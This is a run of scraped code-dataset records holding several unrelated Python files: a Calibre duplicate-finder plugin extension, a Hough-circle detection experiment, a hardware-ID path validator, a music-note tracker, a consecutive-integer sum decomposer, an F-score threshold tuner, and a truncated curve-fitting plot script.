self.sort_books_for_group(books_for_group_map, groups_for_book_map)\n # } \n return books_for_group_map, groups_for_book_map\n\n def sort_books_for_group(self, books_for_group_map, groups_for_book_map):\n book_ids = groups_for_book_map.keys()\n if sort_filters_has_templates(self.sort_filters):\n self.update_mi_cache(book_ids)\n mi_map = self.mi_cache\n else:\n mi_map = {}\n for group_id, group in books_for_group_map.items():\n # python sort is stable, so we loop in reverse to apply from lowest to highest sort filters\n for sort_filter in reversed(self.sort_filters):\n sort_field = sort_filter['field']\n is_reversed = sort_filter['is_reversed']\n template_type = sort_filter.get('template_type')\n sort_function = partial(get_sort_value, self.db, sort_field, template_type, mi_map)\n group.sort(key=lambda x: sort_function(x), reverse=is_reversed)\n books_for_group_map[group_id] = group\n return books_for_group_map\n\n def update_mi_cache(self, book_ids):\n for book_id in book_ids:\n if not self.mi_cache.get(book_id):\n mi = self.db.new_api.get_proxy_metadata(book_id)\n self.mi_cache[book_id] = mi\n\nclass AdvancedDuplicateFinder(DuplicateFinder):\n\n # Update: add extra marks\n FIRST_DUPLICATE_MARK = 'first_duplicate'\n LAST_DUPLICATE_MARK = 'last_duplicate'\n GROUP_SORT_MARK = '_sort_'\n DELETED_BINARY_MARK = 'deleted_binary_duplicate'\n ENTANGLED_GROUP_MARK = 'entangled_group'\n ENTANGLED_BOOK_MARK = 'entangled_book'\n #}\n\n def clear_duplicates_mode(self, clear_search=True, reapply_restriction=True):\n self.deleted_binary_duplicates = []\n DuplicateFinder.clear_duplicates_mode(self, clear_search, reapply_restriction)\n\n def run_book_duplicates_check_advanced(\n self,\n match_rules,\n exemptions_type,\n sort_groups_by_title,\n show_all_duplicates_mode,\n sort_filters,\n flags,\n description=_('Advanced algorithm')):\n '''\n Execute a duplicates search using the specified algorithm and display results\n '''\n self.advanced_mode = True\n self.sort_filters = sort_filters\n \n if not self.is_showing_duplicate_exemptions() and not self.has_results():\n # We are in a safe state to preserve the users current restriction/highlighting\n self._persist_gui_state()\n self.clear_duplicates_mode()\n\n self._is_show_all_duplicates_mode = show_all_duplicates_mode\n \n exemptions_map = self._book_exemptions_map\n if exemptions_type == 'author':\n exemptions_map = self._author_exemptions_map\n \n algorithm = AdvancedAlgorithm(self.gui, self.db, match_rules, exemptions_map, flags, sort_filters)\n self._algorithm_text = description\n self._duplicate_search_mode = algorithm.duplicate_search_mode()\n\n bfg_map, gfb_map = algorithm.run_duplicate_check(sort_groups_by_title)\n\n self._display_run_duplicate_results(bfg_map, gfb_map)\n\n def _persist_gui_state(self):\n DuplicateFinder._persist_gui_state(self)\n # update: preserve sort {\n self.previous_sort = [self.gui.library_view.model().sorted_on]\n # }\n\n def _restore_previous_gui_state(self, reapply_restriction=True):\n DuplicateFinder._restore_previous_gui_state(self, reapply_restriction)\n # update: preserve sort {\n self.gui.library_view.multisort(self.previous_sort)\n # }\n\n # udpate: entangled_books\n def _get_entangled_gooks_and_groups(self):\n '''\n entangled books: books that are part of more than one group\n entangled groups: groups that have one or more entangled books\n '''\n entangled_books = set()\n entangled_groups = set()\n \n if self._groups_for_book_map:\n for book_id, groups in self._groups_for_book_map.items():\n if len(groups) > 1:\n entangled_books.add(book_id)\n \n if entangled_books and self._books_for_group_map:\n for group_id, group in self._books_for_group_map.items():\n if set(group).intersection(set(entangled_books)) != set():\n entangled_groups.add(group_id)\n \n return entangled_books, entangled_groups\n #}\n\n def _update_marked_books(self, mark_author_exemptions=False):\n '''\n Mark the books using the special 'marked' temp column in Calibre\n Note that we need to store multiple types of marked books at once\n The first is marking all of the duplicate groups\n The second is all duplicate book ids, marked with 'duplicates'\n The third is exemptions marked as 'not_book_duplicate' or 'not_author_duplicate'\n\n This will allow us to apply a search restriction of 'marked:duplicates'\n at the same time as doing a search of 'marked:xxx' for our subset,\n while also allowing the user to refresh to get updated results\n\n The only limitation is making sure that we don't overlap the sets by\n using the same substrings like 'duplicates' in the value of marked_text.\n '''\n # update: \n entangled_books, entangled_groups = self._get_entangled_gooks_and_groups()\n #\n marked_ids = dict()\n # Build our dictionary of current marked duplicate groups\n if self._books_for_group_map:\n remaining_group_ids = list(sorted(self._books_for_group_map.keys()))\n for group_id in remaining_group_ids:\n marked_text = '%s%04d' % (self.DUPLICATE_GROUP_MARK, group_id)\n for idx, book_id in enumerate(self._books_for_group_map[group_id], 1):\n # Update: add sort to books inside group {\n if self.advanced_mode:\n book_marked_text = '%s%s%04d' % (marked_text, self.GROUP_SORT_MARK, idx)\n if idx == len(self._books_for_group_map[group_id]):\n book_marked_text = '{},{}'.format(book_marked_text, self.LAST_DUPLICATE_MARK)\n if idx == 1:\n book_marked_text = '{},{}'.format(book_marked_text, self.FIRST_DUPLICATE_MARK)\n if group_id in entangled_groups:\n book_marked_text = '{},{}'.format(book_marked_text, self.ENTANGLED_GROUP_MARK)\n if book_id in entangled_books:\n book_marked_text = '{},{}'.format(book_marked_text, self.ENTANGLED_BOOK_MARK)\n # }\n else:\n book_marked_text = marked_text\n # }\n if book_id not in marked_ids:\n marked_ids[book_id] = book_marked_text\n else:\n marked_ids[book_id] = '%s,%s' % (marked_ids[book_id], book_marked_text)\n\n # Now add the marks to indicate each book that is in a duplicate group\n if self._groups_for_book_map:\n for book_id in list(self._groups_for_book_map.keys()):\n if book_id not in marked_ids:\n marked_ids[book_id] = self.DUPLICATES_MARK\n else:\n # We need to store two bits of text in the one value\n marked_ids[book_id] = '%s,%s' % (marked_ids[book_id], self.DUPLICATES_MARK)\n\n # Add the marks for author duplicate exemptions. This is an expensive operation so\n # we only do it when we really have to (i.e. user is showing author exemptions)\n if mark_author_exemptions:\n if self._author_exemptions_map:\n # Rebuild the map of authors to books\n books_for_author_map = self._create_books_for_author_map()\n for author in list(self._author_exemptions_map.keys()):\n if author in books_for_author_map:\n for book_id in books_for_author_map[author]:\n if book_id not in marked_ids:\n marked_ids[book_id] = self.AUTHOR_EXEMPTION_MARK\n else:\n # We need to store two bits of text in the one value\n marked_ids[book_id] = '%s,%s' % (marked_ids[book_id],\n self.AUTHOR_EXEMPTION_MARK)\n else:\n # Add the marks for book duplicate exemptions\n if self._book_exemptions_map:\n for book_id in list(self._book_exemptions_map.keys()):\n if book_id not in marked_ids:\n marked_ids[book_id] = self.BOOK_EXEMPTION_MARK\n else:\n # We need to store two bits of text in the one value\n marked_ids[book_id] = '%s,%s' % (marked_ids[book_id], self.BOOK_EXEMPTION_MARK)\n\n # Update: mark deleted binaries {\n if self.deleted_binary_duplicates:\n for book_id in self.deleted_binary_duplicates:\n marked_ids[book_id] = '%s,%s' % (marked_ids[book_id], self.DELETED_BINARY_MARK)\n #}\n\n # Assign the results to our database\n self.gui.current_db.set_marked_ids(marked_ids)\n\n def _delete_binary_duplicate_formats(self, books_for_group_map): \n if DEBUG:\n prints('Automatically removing binary format duplicates')\n\n hash_map = self.db.get_all_custom_book_data('find_duplicates', default={})\n for books_list in list(books_for_group_map.values()):\n # Determine the oldest book format in this group\n earliest_book_id = books_list[0]\n earliest_date = self.db.timestamp(earliest_book_id, index_is_id=True)\n for idx in list(range(1, len(books_list))):\n book_date = self.db.timestamp(books_list[idx], index_is_id=True)\n if book_date < earliest_date:\n earliest_book_id = books_list[idx]\n earliest_date = book_date\n other_book_ids = [book_id for book_id in books_list if book_id != earliest_book_id]\n\n book_map = hash_map[earliest_book_id]\n # Now iterate through the formats for this oldest book\n for fmt, info in list(book_map.items()):\n for other_book_id in other_book_ids:\n other_book_map = hash_map[other_book_id]\n if fmt not in other_book_map:\n continue\n other_info = other_book_map[fmt]\n if info['size'] == other_info['size'] and info['sha'] == other_info['sha']:\n if DEBUG:\n prints('Removing duplicate format: %s from book: %d'%(fmt, other_book_id))\n self.db.remove_format(other_book_id, fmt, index_is_id=True, notify=False)\n # Update: mark entries whose duplicate format is deleted automatically during binary compare {\n self.deleted_binary_duplicates.append(other_book_id)\n #}\n\nclass AdvancedCrossLibraryDuplicateFinder(CrossLibraryDuplicateFinder):\n def run_library_duplicates_check(self, library_path, match_rules, flags):\n self.flags = flags\n self.library_path = library_path\n self.match_rules = match_rules\n from calibre.library import db as DB\n self.target_db = DB(self.library_path, read_only=True)\n\n # We will re-use the elements of the same basic algorithm code, but\n # only by calling specific functions to control what gets executed\n # since the approach for comparing all books in one library with another\n # significantly differs. Also of course book exemptions will not apply.\n\n message = self._do_comparison()\n\n self.gui.status_bar.showMessage('Duplicate search completed', 3000)\n txt = self.log.plain_text\n if txt:\n txt = _('Results of {0} comparison:\\n Source library: {1}\\n Target library: {2}\\n\\n{3}').format(\n self.algorithm_text, self.db.library_path, self.library_path, txt)\n d = SummaryMessageBox(self.gui, 'Library Duplicates', message, det_msg=txt)\n d.exec_()\n\n def _do_comparison(self):\n '''\n When analysing the current database, we do not want to hash every book with\n every other book in this database. Instead we want to determine the hash\n and then compare it with the hashes we have from the other database.\n So we will not be reporting duplicates within this database, only duplicates\n from each individual book in this database with the target database.\n '''\n algorithm = AdvancedAlgorithm(self.gui, self.db, self.match_rules, exemptions_map=None, flags=self.flags)\n self.algorithm_text = 'Advanced Algorithm'\n duplicates_count = 0\n duplicate_book_ids = None\n\n duplicates_count, duplicate_book_ids, msg = self._do_advanced_comparison(algorithm)\n\n if duplicates_count > 0:\n msg += \"

\" + _(\"Click 'Show details' to see the results.\")\n if duplicate_book_ids is not None:\n marked_ids = {}\n for book_id in duplicate_book_ids:\n marked_ids[book_id] = 'library_duplicate'\n self.gui.current_db.set_marked_ids(marked_ids)\n self.gui.search.set_search_string('marked:library_duplicate')\n return msg\n\n def _do_advanced_comparison(self, algorithm):\n self.gui.status_bar.showMessage(_('Analysing duplicates in target database...'), 0)\n target_candidates_map, author_bookids_map_unused = self._analyse_target_database()\n\n # Use the standard approach to get current library book ids for consideration\n book_ids = algorithm.get_book_ids_to_consider()\n duplicate_book_ids = []\n\n self.gui.status_bar.showMessage(_('Analysing duplicates in current database...'), 0)\n # Iterate through these books getting our hashes\n for book_id in book_ids:\n # We will create a temporary candidates map for each book, since we are\n # not interested in hashing the current library's books together. And we\n # can't give it the map from the target database, because we won't know\n # which database each group's ids belong to!\n book_candidates_map = defaultdict(set)\n algorithm.find_candidate(book_id, book_candidates_map, include_languages=False)\n # We now have any hash(s) for the current book in our candidates map.\n # See if we have them in our target library map too to indicate a duplicate\n duplicate_books = set()\n for book_hash in book_candidates_map:\n if book_hash in target_candidates_map:\n duplicate_books |= target_candidates_map[book_hash]\n if len(duplicate_books) > 0:\n duplicate_book_ids.append(book_id)\n self.log('Book in this library: %s'%self._get_book_display_info(self.db, book_id, include_identifier=False))\n dups = [self._get_book_display_info(self.target_db, dup_book_id)\n for dup_book_id in duplicate_books]\n for dup_text in sorted(dups):\n self.log(' Target library: %s'%dup_text)\n self.log('')\n\n msg = _('Found {0} books with potential duplicates using {1} against the library at: {2}').format(len(duplicate_book_ids), self.algorithm_text, self.library_path)\n return len(duplicate_book_ids), duplicate_book_ids, msg\n\n def _analyse_target_database(self):\n '''\n Get the candidates using algorithm against the target database.\n Similar to a regular duplicate check except that:\n (a) it applies to a different database\n (b) it will not apply restrictions (all_ids, not model ids)\n (c) we do *not* want to shrink the candidates map as we must use it to\n \"add\" candidates from *this* database too.\n '''\n algorithm = AdvancedAlgorithm(self.gui, self.target_db, self.match_rules, exemptions_map=None, flags=self.flags)\n self.algorithm_text = 'Advanced Algorithm'\n\n book_ids = self.target_db.all_ids()\n\n target_candidates_map = algorithm.find_candidates(book_ids, include_languages=False)\n author_bookids_map = None\n # Bit of a bodge. If we are running an author only comparison, we want\n # the additional map that algorithm creates listing the books per author\n # in order to display that information in the log results.\n if hasattr(algorithm, 'author_bookids_map'):\n author_bookids_map = algorithm.author_bookids_map\n return target_candidates_map, author_bookids_map\n\nclass AdvancedVariationAlgorithm(VariationAlgorithm, HashFuncs):\n\n def run_variation_check(self, match_rules, possible_cols):\n '''\n The entry point for running the algorithm\n '''\n self.possible_cols = possible_cols\n \n item_type = match_rules[0]['field']\n \n data_map = self._get_items_to_consider(item_type)\n \n all_metadata = self.db.new_api.field_metadata.all_metadata()\n self.fn = partial(self.metadata_item_hash, match_rules, all_metadata)\n start = time.time()\n\n # Get our map of potential duplicate candidates\n if DEBUG:\n prints('Find Duplicates: Analysing %d %s for duplicates...' % (len(data_map), item_type))\n candidates_map = self._find_candidates(data_map)\n\n # Convert our dictionary of potential candidates into a map by\n # item id that has flattened the results out.\n matches_for_item_map = self._flatten_candidates_for_item(candidates_map, data_map)\n\n # Now lookup how many books there are for each candidate\n count_map = self._get_counts_for_candidates(matches_for_item_map, item_type)\n\n if DEBUG:\n prints('Find Duplicates: Completed duplicate analysis in:', time.time() - start)\n prints('Find Duplicates: Found %d duplicate groups'%(len(matches_for_item_map),))\n\n return data_map, count_map, matches_for_item_map\n\n def _get_items_to_consider(self, item_type):\n '''\n Return a map of id:text appropriate to the item being analysed\n '''\n # Ensure that when we ask for authors with ids etc, make sure that we\n # are only getting the records that are linked to books and not stale data\n # (which was fixed on 0.8.61)\n from calibre.customize import numeric_version\n if numeric_version < (0, 8, 61):\n self.db.clean()\n if item_type == 'authors':\n results = self.db.get_authors_with_ids()\n results = [(a[0], a[1].replace('|',',')) for a in results]\n elif item_type == 'series':\n results = self.db.get_series_with_ids()\n elif item_type == 'publisher':\n results = self.db.get_publishers_with_ids()\n elif item_type == 'tags':\n results = self.db.get_tags_with_ids()\n else:\n #raise Exception('Unknown item type:', item_type)\n # Update: add custom column to metadata variations {\n results = self.db.get_custom_items_with_ids(self.possible_cols[item_type]['label'])\n #}\n return dict((x[0],x[1]) for x in results)\n","sub_path":"advanced/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":22399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"318813981","text":"import numpy as np\nfrom shapely.geometry.point import Point\nfrom skimage.draw import circle_perimeter_aa\nimport matplotlib.pyplot as plt\nimport cv2\n\ndef draw_circle(img, row, col, rad):\n rr, cc, val = circle_perimeter_aa(row, col, rad)\n valid = (\n (rr >= 0) &\n (rr < img.shape[0]) &\n (cc >= 0) &\n (cc < img.shape[1])\n )\n img[rr[valid], cc[valid]] = val[valid]\n return img\n\ndef noisy_circle(size, radius, noise):\n img = np.zeros((size, size), dtype=np.float)\n\n # Circle\n row = np.random.randint(size)\n col = np.random.randint(size)\n rad = np.random.randint(10, max(10, radius))\n img = draw_circle(img, row, col, rad)\n\n # Noise\n img += noise * np.random.rand(*img.shape)\n return (row, col, rad), img\n\n\n# def normalize_range(img):\n# '''\n# Normalizes range of input image\n# @param img: input image\n# @return img: image in range [0,255]\n \n# '''\n# img = 255*(img - np.min(img))/(np.max(img) - np.min(img))\n# img = img.astype(\"uint8\")\n# return img\n\n\n# def clean_circle(params, size=200):\n# '''\n# Creates an image of the clean circle for model training\n \n# '''\n# row, col, rad = params\n# img = np.zeros((size, size), dtype=np.float)\n# img = draw_circle(img, row, col, rad)\n# return img\n\n\ndef find_circle(img):\n circles = cv2.HoughCircles(img, cv2.HOUGH_GRADIENT, 1, 100,\n param1=30,\n param2=15,\n minRadius=0,\n maxRadius=0)\n if circles is not None:\n params = circles[0][0]\n col, row, rad = int(params[0]), int(params[1]), int(params[2])\n return (row, col, rad)\n else:\n return (1,1,1)\n\n\ndef iou(params0, params1):\n row0, col0, rad0 = params0\n row1, col1, rad1 = params1\n\n shape0 = Point(row0, col0).buffer(rad0)\n shape1 = Point(row1, col1).buffer(rad1)\n\n return (\n shape0.intersection(shape1).area /\n shape0.union(shape1).area\n )\n\n\ndef main():\n results = []\n training_dataset = []\n for i in range(1000):\n params, img = noisy_circle(200, 50, 2)\n \n tmp = {}\n tmp['params'] = params\n tmp['img'] = img\n training_dataset.append(tmp)\n \n detected = find_circle(img)\n results.append(iou(params, detected))\n results = np.array(results)\n print((results > 0.7).mean())\n \n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"420163625","text":"import logging\nimport re\nfrom collections import defaultdict\n\nimport HWID.Database\n\nclass PathsHwidValidator():\n \"\"\"Validates all the lines of paths.txt.\"\"\"\n\n prog = re.compile(r\"^(?P\\d+)(?P[UD]) (?P\\d+) (?P\\d+)$\")\n\n def __init__(self, variant):\n self.PathsHWIDTable = defaultdict(list)\n\n # process uplink path HWIDs for variant\n for k in range(variant.UplinkPathVariantsLength()):\n pathVariant = variant.UplinkPathVariants(k)\n for l in range(pathVariant.RevisionsLength()):\n pathRevision = pathVariant.Revisions(l)\n self.PathsHWIDTable[('U', pathVariant.VariantCode())].append(pathRevision.RevisionCode())\n\n # process downlink path HWIDs for variant\n for k in range(variant.DownlinkPathVariantsLength()):\n pathVariant = variant.DownlinkPathVariants(k)\n for l in range(pathVariant.RevisionsLength()):\n pathRevision = pathVariant.Revisions(l)\n self.PathsHWIDTable[('D', pathVariant.VariantCode())].append(pathRevision.RevisionCode())\n\n\n def validate(self, pathsTxt_path):\n with open(pathsTxt_path) as pathsTxt:\n for pathHwidLine in pathsTxt:\n if not self.validatePatternMatching(pathHwidLine, pathsTxt_path):\n return False\n\n pathsTxt.seek(0)\n if not self.validateIdConsistency(pathsTxt, 'U', pathsTxt_path):\n return False\n\n pathsTxt.seek(0)\n if not self.validateIdConsistency(pathsTxt, 'D', pathsTxt_path):\n return False\n\n pathsTxt.seek(0)\n for pathHwidLine in pathsTxt:\n if not self.validateDatabaseMatching(pathHwidLine, pathsTxt_path):\n return False\n\n return True\n\n\n def validatePatternMatching(self, pathHwidLine, pathsTxt_path):\n match = PathsHwidValidator.prog.match(pathHwidLine)\n if not match:\n logging.error( u'File ' + pathsTxt_path + ' is not valid. Line ' + pathHwidLine + ' do not match the pattern.')\n return False\n return True\n\n\n def validateIdConsistency(self, pathsTxt, direction, pathsTxt_path):\n ids = []\n for pathHwidLine in pathsTxt:\n match = PathsHwidValidator.prog.match(pathHwidLine)\n groups = match.groupdict()\n if groups['direction'] == direction:\n ids.append(int(groups['id']))\n\n if not ids:\n logging.error( u'File ' + pathsTxt_path + ' is not valid. No lines for ' + direction + ' direction.')\n return False\n\n if not ids == list(range(1, max(ids) + 1)):\n logging.error( u'File ' + pathsTxt_path + ' is not valid. Ids should make a sequence of numbers starting from 1, with no duplicates and gaps.')\n return False\n\n return True\n\n\n def validateDatabaseMatching(self, pathHwidLine, pathsTxt_path):\n match = PathsHwidValidator.prog.match(pathHwidLine)\n groups = match.groupdict()\n direction = groups['direction']\n variant = int(groups['variant'])\n revision = int(groups['revision'])\n\n if not (direction, variant) in self.PathsHWIDTable:\n logging.error( u'File ' + pathsTxt_path + ' is not valid. Line ' + pathHwidLine + ' do not match the database. Direction and variant do not match.')\n return False\n\n if all (dbrevision > revision for dbrevision in self.PathsHWIDTable[(direction, variant)]):\n logging.error( u'File ' + pathsTxt_path + ' is not valid. Line ' + pathHwidLine + ' do not match the database. Revision is not supported.')\n return False\n\n return True\n\n","sub_path":"tools/PathsHwidValidator.py","file_name":"PathsHwidValidator.py","file_ext":"py","file_size_in_byte":3668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"541067252","text":"\nfrom collections import defaultdict\nfrom note import Note, Chord\n\nclass Tracker():\n\t\"\"\"docstring for Tracker\"\"\"\n\tdef __init__(self, sheet):\n\t\tself.sheet = sheet\n\t\tself.fixRange(0, len(sheet))\n\t\t\n\tdef fixRange(self, start, end):\n\t\t# start to end non inclusive\n\t\tself.length = end - start\n\t\tself.notePosition = defaultdict(list)#try a linked list\n\t\tfor i, n in enumerate(self.sheet[start : end + 1]):\n\t\t\tself.notePosition[n.name].append(i)\n\t\tself.lastPosition = []\n\n\tdef locate(self, note, tempo = 0):\n\t\tif self.length == 0:\n\t\t\treturn []\n\t\tmatch = []\n\t\tfor lp in self.lastPosition:\n\t\t\tif lp + 1 >= self.length:\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tif tempo == 0:\n\t\t\t\t\tnextNote = self.ignoreRests(lp + 1)\n\t\t\t\t\tif nextNote == self.length:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif self.sheet[nextNote] == note:\n\t\t\t\t\t\t# print('tempoless match at', nextNote)\n\t\t\t\t\t\tmatch.append(nextNote)\n\t\t\t\telse:\n\t\t\t\t\tif str(self.sheet[lp + 1]) == str(note):\n\t\t\t\t\t\t# print('tempo match at', lp + 1)\n\t\t\t\t\t\tmatch.append(lp + 1)\n\t\tif len(match) == 0:\n\t\t\tself.lastPosition = self.notePosition[note.name]\n\t\telse:\n\t\t\tself.lastPosition = match\n\t\treturn self.lastPosition\n\n\tdef ignoreRests(self, start):\n\t\twhile start < self.length and self.sheet[start].name == 'rest':\n\t\t\tstart += 1\n\t\t\tcontinue\n\t\treturn start\n\n\tdef recognise(self, source):\n\t\tpass\n\ntest = ['C', 'A', 'B', 'C', 'B', 'rest', 'rest', 'rest', 'C', \\\n\t'D', 'E', 'C', 'B', 'A#', 'Ab', 'B', 'F', 'E', 'G', 'rest', 'rest', 'rest']\nwaltz = [Note(t, i, (1, 4)) for i, t in enumerate(test)]\ntestin = ['B', 'C', 'E', 'B', 'G', 'A']\nhits = [Note(h, i, (1, 3)) for i, h in enumerate(testin)]\n\nT = Tracker(waltz)\nfor t in T.notePosition:\n\tprint(t, T.notePosition[t])\nfor h in hits:\n\tprint('locating', h, ':', T.locate(h))\n\n\n","sub_path":"locate.py","file_name":"locate.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"447623546","text":"\"\"\"\n某些整数能分解成若干个连续整数的和的形式,例如\n15 = 1 + 2+3+4+5\n15 = 4 + 5 + 6\n
15 = 7 + 8\n某些整数不能分解为连续整数的和,例如:16 
\n输入: 一个整数N(N <= 10000)\n输出:整数N对应的所有分解组合,按照每个分解中的最小整数从小到大输出,\n每个分解占一行 ,每个数字之间有一个空格(每 行最后保留一个空格);\n如果没有任何分解组合, 则输出NONE。\n\n\"\"\"\n# *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\n# 进行所有因数的判断 包含整数和0.5型\n# 根据题意, 15没有分解成 15 = 0 + 1 + 2 + 3 + 4 + 5\n# 故在本题中不考虑0的情况\n\n# 思路: 每个分解成开的连续整数都可以看成\n# avg(连续整数) * 个数\n# 如果'个数'是奇数, avg(连续整数)就必须是整数\n# 如果'个数'是偶数, avg(连续整数)就必须是0.5型的整数\n# 用这个思路, 做出判断\n# 首先, 先做出 可以整除整数和0.5型整数的数字, 放入字典\n# 然后, 循环字典的键和值, 组成字符串\n# *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\n\n\nj_dict = {}\ni_dict = {}\nstring_list = []\n\n\ndef yin_shu(num):\n \"\"\"\n 做出字典{可以整除的数字: 个数}\n :param num:\n :return:\n \"\"\"\n global i_list, j_dict\n for j in range(2, int((num + 1) / 2) + 1): # 循环2 到 num/2\n if num % j == 0: # 获得整数因子\n j_dict[j] = int(num / j) # 字典形式储存 整数因子:整除的数\n if num % (j + 0.5) == 0: # 获得0.5型因子\n j_dict[j + 0.5] = int(num / (j + 0.5)) # 字典形式储存\n\n\n# print(j_dict)\n\n\ndef make_string(j_dict):\n \"\"\"\n 循环字典的键和值, 组成字符串\n :param j_dict:\n :return:\n \"\"\"\n global string_list\n for k, v in j_dict.items():\n # print((k, v))\n if k <= v / 2: # 不可能实现,这里把'等于'排除,因为本题不包含0的情况\n continue\n if type(k) is int:\n if v % 2 != 0: # k为整数时, v必须是奇数才可以凑出来\n i_dict[k] = v\n string = \"{} = \".format(n)\n for c in range(k - v // 2, (k + v // 2) + 1):\n string += \"{} + \".format(c) # 制作字符串\n else:\n string = string[:-2]\n string_list.append(string)\n else:\n if v % 2 == 0: # k为0.5型数字时, v必须是偶数数才可以凑出来\n i_dict[k] = v\n string = \"{} = \".format(n)\n for c in range(int((k - v // 2) + 0.5), int((k + v // 2) - 0.5 + 1)):\n string += \"{} + \".format(c) # 制作字符串\n else:\n string = string[:-2]\n string_list.append(string)\n\n # print(i_dict)\n # print(string_list)\n if string_list:\n for p_string in string_list:\n print(p_string)\n else:\n print('NULL')\n\n\nif __name__ == '__main__':\n n = 15\n yin_shu(n) # n为你要输入的值\n make_string(j_dict) # 组成字符串打印\n","sub_path":"c2.py","file_name":"c2.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"386147084","text":"from DataParser import DataParser as DataParser\nfrom model3 import Model3 as Model\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import confusion_matrix\nimport numpy as np\nimport matplotlib as plt\n\n\ndef thresholdTuning(tr,pr):\n pre = set(pr)\n pre=set([round(elem,4) for elem in pre])\n bestF=0\n bestThre=0\n pr=np.array(pr)\n for thre in pre:\n scr=f1_score(tr,pr>=thre)\n if scr>bestF:\n bestF=scr\n bestThre=thre\n return bestF,bestThre\n\n \ndef ComputeFscore(modelfile,testfile,outputfile):\n maxParagraphLength=20\n maxParagraphs=10\n #nlabels=1001\n #vocabularySize=76391\n labels=8\n vocabularySize=244\n model = Model(maxParagraphLength,maxParagraphs,labels,vocabularySize)\n\n testing = DataParser(maxParagraphLength,maxParagraphs,labels,vocabularySize)\n testing.getDataFromfile(testfile)\n\n model.load(modelfile)\n\n print(\"loading done\")\n\n testing.restore()\n truePre=[]\n pred=[]\n for itr in range(testing.totalPages):\n data=testing.nextBatch(1)\n truePre.append(data[0])\n pre=model.predict(data)\n pred.append(pre[0])\n\n labelsCount={}\n ConfusionMa={}\n fScr={}\n\n thres=0.5\n valid=int(len(truePre)*0.5) #using first 50% data for threshold tuning - we have merged test and cv files\n labelsCount={}\n ConfusionMa={}\n fScr={}\n thresLab={}\n for la in range(labels):\n if la%25==0:\n print(\"Current label\",la)\n t=[]\n p=[]\n for i in range(valid):\n t.append(truePre[i][0][la])\n p.append(pred[i][la])\n bestF,bestThre=thresholdTuning(t,p)\n \n t=[]\n p=[]\n for i in range(valid,len(truePre)):\n t.append(truePre[i][0][la])\n p.append(pred[i][la])\n \n p=np.array(p)\n fScr[la]=f1_score(t,p>=bestThre)\n ConfusionMa[la]= confusion_matrix(t,p>bestThre)\n thresLab[la]=bestThre\n \n f=open(outputfile,\"w\")\n sum_fscore = 0.0\n for i in range(labels):\n\n sum_fscore = sum_fscore + fScr[i]\n inp=str(i)+\",\"+str(thresLab[i])+\",\"+str(fScr[i])+\"\\n\"\n f.write(inp)\n f.write(str(sum_fscore / float(labels - 1)))\n\n print(sum_fscore)\n print(sum_fscore / float((labels - 1)))\n f.close()\n return (sum_fscore / float((labels - 1)))\n\n\nif __name__ == '__main__':\n testfile = \"C:/gitrepo/Wiki-Text-Categorization/Distant Supervision/Reuter_dataset/reuters_sparse_testcvmerged.txt\"\n modelfile = \"models/model3_reuter_100\"\n outputfile = \"results/fscorelabelwise_100.txt\"\n ComputeFscore(modelfile,testfile,outputfile)\n\n# if __name__ == '__main__':\n# testfile = \"C:/gitrepo/Wiki-Text-Categorization/Distant Supervision/Reuter_dataset/reuters_sparse_test.txt\"\n \n# fscore_epochs =[]\n# startepoch = 50\n# endepoch = 100\n# epochstep = 10\n# for i in range(startepoch,endepoch,epochstep):\n# print(i)\n# modelfile = \"models/model3_reuter_\" + str(i)\n# outputfile = \"results/fscorelabelwise_\" + str(i) + \".txt\"\n# print(modelfile)\n# print(outputfile)\n# val = ComputeFscore(modelfile,testfile,outputfile)\n# fscore_epochs.append(val)\n# print(val)\n\n# print(fscore_epochs)\n# epochslist = list(np.arange(startepoch,endepoch,epochstep))\n# plt.plot(epochslist,fscore_epochs)\n\n# plt.axis([startepoch,endepoch,0,1])\n# plt.xticks(np.arange(startepoch,endepoch, epochstep))\n# plt.yticks(np.arange(0.6,1, 0.05))\n\n# plt.ylabel('fscore')\n# plt.xlabel('epochs')\n# plt.show()\n# fig = plt.figure()\n# fig.savefig('miml model3_reuter_fscores.png')\n","sub_path":"Reuter/MIML/model3/Fscore_labelwise.py","file_name":"Fscore_labelwise.py","file_ext":"py","file_size_in_byte":3662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"3118390","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\n\n\n\nN, rN = np.genfromtxt('build/output.txt', unpack=True)\n\n\nplt.plot(N, np.sqrt(rN), 'x',label=\"Daten\")\nplt.xlabel(\"$N$\")\nplt.ylabel(\"$R_N$\")\n# plt.ylim(0,np.sqrt(rN[len(rN)-1])+2)\nplt.legend(loc='best')\nplt.tight_layout()\nplt.grid()\n\nplt.savefig('build/Aufg_1_a.pdf')\nplt.close()\n############################################################################################\n\ndef func(x,n,a,b):\n return b*x**n+a\n\npopt, pcov = curve_fit(func,N,np.sqrt(rN))\nn,a,b=popt\nperr = np.sqrt(np.diag(pcov))\nprint(\"Exponent D der Fitfunktion: %.3f +- %.3f \\n\" %(n,perr[0]))\nx=np.linspace(N[0],N[len(N)-1],100)\nplt.plot(x**(n), func(x,n,a,b), 'k-',label=\"Fit R_N = a*N^D+b\" )\n\nplt.plot(N**(n), np.sqrt(rN), 'x',label=\"Daten\")\nplt.xlabel(\"$N^D$\")\nplt.ylabel(\"$R_N$\")\n# 